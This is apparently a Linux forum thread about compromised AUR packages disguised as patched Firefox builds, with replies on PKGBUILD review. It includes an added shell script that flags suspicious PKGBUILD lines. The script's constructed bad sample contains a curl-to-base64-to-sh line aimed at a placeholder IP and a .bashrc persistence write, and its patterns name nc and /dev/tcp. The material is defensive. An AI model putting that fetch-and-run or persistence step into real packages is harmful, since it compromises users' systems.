
AUR firefox might be infected

This story suggests arch AUR firefox derivatives might be compromised.


Re: AUR firefox might be infected

Reply #2
Yep, I've seen this story making the rounds. It's honestly probably not a big deal.
Quote: "The compromised packages were called librewolf-fix-bin, firefox-patch-bin, and zen-browser-patched-bin"
If anyone installed one of these obviously sketchy packages, you should not have an AUR helper installed on your system. It's for your own good.

Brodie Robertson on YouTube speculated that it already got installed a few times because they had some votes. I tend to believe that those numbers were artificially inflated by dummy accounts. Then the perp thought it wise to get a bunch of Redditors' eyes on it, which resulted in their prompt removal from the AUR.

Let this be a reminder to read and understand PKGBUILDs before building and installing them.

Re: AUR firefox might be infected

Reply #3
Let this be a reminder to read and understand PKGBUILDs before building and installing them.

These words can't be any truer. If possible, just avoid the AUR.
I still have not found a reason to install from the AUR (ymmv of course)
Supercalifragilisticexpialidocious

Re: AUR firefox might be infected

Reply #4
Let this be a reminder to read and understand PKGBUILDs before building and installing them.

These words can't be any truer. If possible, just avoid the AUR.
I still have not found a reason to install from the AUR (ymmv of course)


Really... I have. In fact, I get vital software I cannot live without from the AUR, not the least of which is Window Maker, the window manager of choice for me, and linphone, and open-numismat, google-earth, several software development tools...

 

Re: AUR firefox might be infected

Reply #5


These words can't be any truer. If possible, just avoid the AUR.
I still have not found a reason to install from the AUR (ymmv of course)


Really... I have. In fact, I get vital software I cannot live without from the AUR, not the least of which is Window Maker, the window manager of choice for me, and linphone, and open-numismat, google-earth, several software development tools...

Yeah - I just don't see a reason to use the AUR (for me).
If there is an app I really, really need, I'll just grab the source and compile myself. There was a time though, a few years back, when I wanted to move from Eagle CAD to KiCad. Back then, only really, really new KiCad had the import feature. That was about as complex as I got.
Of course, now that the import feature is standard... Oh wait, there is possibly one. Chirp - but here again, I could just go to the source.
Supercalifragilisticexpialidocious

Re: AUR firefox might be infected

Reply #6
Yeah - I just don't see a reason to use the AUR (for me).
If there is an app I really, really need, I'll just grab the source and compile myself.
If you just review a simple PKGBUILD the same thing results.
Not all PKGBUILDs are simple though..
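Added example (not code from anyone in this thread): a small POSIX shell triage script for the "read and understand PKGBUILDs before building" advice in Reply #2 and the "review a simple PKGBUILD" point in Reply #6. It greps a PKGBUILD for the constructs a reviewer should stop and read closely (downloads outside source=(), decode-and-exec at build time, writes outside $pkgdir, persistence paths, raw IP URLs, checksum SKIP). The two PKGBUILDs it runs against are constructed here; the package names, the example.invalid URLs and the 203.0.113.7 address are placeholders, not anything from the real packages named above.

```shell
#!/bin/sh
# Added example, not from this thread: flag constructs in a PKGBUILD that a
# reviewer should read before running makepkg. A hit is a line to examine, not
# proof of malice; clean output is not proof of safety either.

# flag LABEL PATTERN FILE [EXCLUDE]: print "LABEL: line N:<text>" per match,
# dropping matches that also match EXCLUDE.
flag() {
    label=$1; pat=$2; file=$3; excl=${4:-__none__}
    grep -nE "$pat" "$file" | grep -vE "$excl" | while IFS= read -r m; do
        printf '%s: line %s\n' "$label" "$m"
    done
}

audit_pkgbuild() {
    f=$1
    # Downloads belong in source=() so makepkg checks them against the sums
    # arrays; a fetch inside build()/package() bypasses that check.
    flag 'fetch outside source=()' \
        '^[[:space:]]*(curl|wget|git[[:space:]]+clone|nc|ncat)[[:space:]]' "$f"
    # Decoding or eval'ing data at build time hides what actually runs.
    flag 'decode/eval at build time' \
        '(base64[[:space:]]+(-d|--decode)|eval[[:space:]]|xxd[[:space:]]+-r|/dev/tcp/)' "$f"
    # package() must only write under $pkgdir; absolute system paths escape
    # pacman's file tracking (the "No package owns" situation in Reply #7).
    flag 'write outside $pkgdir' \
        '(cp|install|mv|ln|tee)[[:space:]].*[[:space:]]/(usr|etc|var|opt|home)/' "$f" 'pkgdir'
    # Shell rc files, units or cron entries are persistence, not packaging.
    flag 'persistence path' \
        '(\.bashrc|\.profile|systemd/system|crontab|ld\.so\.preload)' "$f"
    # A raw IP instead of a project domain is unusual for a real upstream.
    flag 'raw IP in URL' 'https?://[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' "$f"
    # SKIP turns off checksum verification for that source entry.
    flag 'checksum SKIP' \
        '^[[:space:]]*(md5sums|sha1sums|sha256sums|sha512sums|b2sums)=.*SKIP' "$f"
}

# count_findings FILE: number of flagged lines, the value a caller gates on.
count_findings() {
    audit_pkgbuild "$1" | wc -l | tr -d ' '
}

# Constructed sample 1: the shape a tampered "patched binary" PKGBUILD can take.
# pkgname, the URL and 203.0.113.7 (a documentation-only address) are placeholders.
BAD=$(mktemp)
cat > "$BAD" <<'EOF'
pkgname=example-patched-bin
pkgver=1.0
pkgrel=1
arch=('x86_64')
source=("https://example.invalid/$pkgname-$pkgver.tar.gz")
sha256sums=('SKIP')
build() {
  curl -fsSL http://203.0.113.7/x | base64 -d | sh
}
package() {
  install -Dm755 helper /usr/local/bin/helper
  echo '/usr/local/bin/helper &' >> "$HOME/.bashrc"
}
EOF

# Constructed sample 2: an ordinary source build that stays inside $pkgdir.
GOOD=$(mktemp)
cat > "$GOOD" <<'EOF'
pkgname=hello-example
pkgver=2.12
pkgrel=1
arch=('x86_64')
source=("https://example.invalid/hello-$pkgver.tar.gz")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000')
build() {
  cd "$srcdir/hello-$pkgver"
  make
}
package() {
  cd "$srcdir/hello-$pkgver"
  make DESTDIR="$pkgdir" install
}
EOF
trap 'rm -f "$BAD" "$GOOD"' EXIT

audit_pkgbuild "$BAD"
echo "findings: $(count_findings "$BAD") in sample 1, $(count_findings "$GOOD") in sample 2"
```

Run it as `sh audit.sh` (any POSIX sh; only grep, wc and mktemp are used). Sample 1 produces six findings (the curl line alone trips three rules), sample 2 none. The script is deliberately a line-oriented first pass: it tells you which lines to read, it does not replace reading the whole file, and a PKGBUILD that sources a second script or builds from a binary tarball still needs the tarball and that script looked at too.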

Re: AUR firefox might be infected

Reply #7
I have some customized packages, e.g. gvim, which I prefer to use compiled against gtk2 rather than gtk3. It's fairly easy to download the pkg repo from artix or arch and then make small changes to the PKGBUILD.

I think using makepkg with a modified official PKGBUILD is probably less risky and at least preserves the pacman database.

Compiling from source will scatter files about and possibly lead to confusion; as an example, I just found

$ packer -Qo /lib/pyston3.8
error: No package owns /lib/pyston3.8

I vaguely remember pyston, but 3.8 was a long time ago :(

Re: AUR firefox might be infected

Reply #8
On a Debian-based system with no AUR, building from source was quite common. The thing to do was to define the install directory to be under /usr/local during the build configuration; you shouldn't touch the main system dirs, to avoid problems. It can be done without the AUR, but it still won't stop the risk of installing infected software if it's in the source itself, which can happen too. Using the AUR actually adds another layer of oversight and could be seen as making things safer in some ways than picking up random code online, despite the additional risk of a compromised PKGBUILD; there are advantages and drawbacks to both approaches, I think. You could stick to only using official code and not forks, but you can make that same choice in the AUR as well.